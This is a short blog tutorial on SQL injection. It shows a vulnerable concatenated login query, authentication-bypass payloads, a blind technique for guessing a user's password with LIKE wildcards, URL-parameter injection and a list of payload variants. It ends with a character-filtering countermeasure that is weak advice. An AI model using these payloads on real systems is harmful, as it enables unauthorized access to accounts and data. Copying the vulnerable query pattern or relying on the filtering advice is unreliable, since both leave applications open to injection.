Check out these links :
http://cyberinsecure.com/citysights-ny-website-breached-110000-memebers-credit-card-details-stolen/
http://cyberinsecure.com/savannah-free-software-collaborative-development-platform-hacked-accounts-compromised-through-sql-injection/
http://cyberinsecure.com/new-mass-injection-attack-adds-rogue-code-to-js-files-rackspace-and-media-temple-affected/
The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.
Let's suppose, when a user enters username & password, following query is forwarded to sql database.
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "' AND `pass` = '" + password + "';"Now, if we put (' or '1'='1)/('OR''=')/(hi' or 1=1--) in userName & pass, then we can login with username of first name in the users table .
Generally, the attacker should try to force a system to return an sql query error inorder to find the vulnerability. In this case once you have username (let it's ron) you can work out the password by entering username as anything
' OR EXISTS(SELECT * FROM users WHERE name='ron' AND password LIKE '%w%') AND ''='You need to know basics of sql before trying to understand above command. What we did - after entering anything in username & '' for password, then appending an OR statement which will return true if w is present in password. %w% is a wildcard, meaning their can be any character before & after w in the password like asaswdfd, fdgwdfw. _w% means, w should be second character like dwbxx.
As username will return false & password will return false, the result depends on statement after OR. If that statement is true, you will be granted access, if false, then denied.
You can understand it from logical AND OR gate.
0 AND 0 OR 1 = 1
0 AND 0 OR 0 = 0 . Observe, that output depends on last digit. Same thing is happening here.
Similarly, you can further modify & try different queries. You can even create new queries which is only limited by your imagination.
You can even try this thing in URL. Suppose URL is like this -
http://game.com/search.asp?category=sports which is passing the query
SELECT * FROM search WHERE category='sports'You can append it like this one -
http://game.com/search.asp?category=sports' or 1=1--
which will send query -
SELECT * FROM search WHERE category='sports' or 1=1--'I think, you can understand what I meant . Instead of appending ' or 1=1--, you can try other options -
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
'or''= Countermeasures: Filter out character like ' " - / \ ; NULL, etc. in all strings from:
* Input from users
* Parameters from URL
* Values from cookie
Note: This is a very basic post just to create a level of understanding of SQL Injection. These types of attack are now very rare.
Visit http://sqlzoo.net & use Google for further understanding the concept .
No comments:
Post a Comment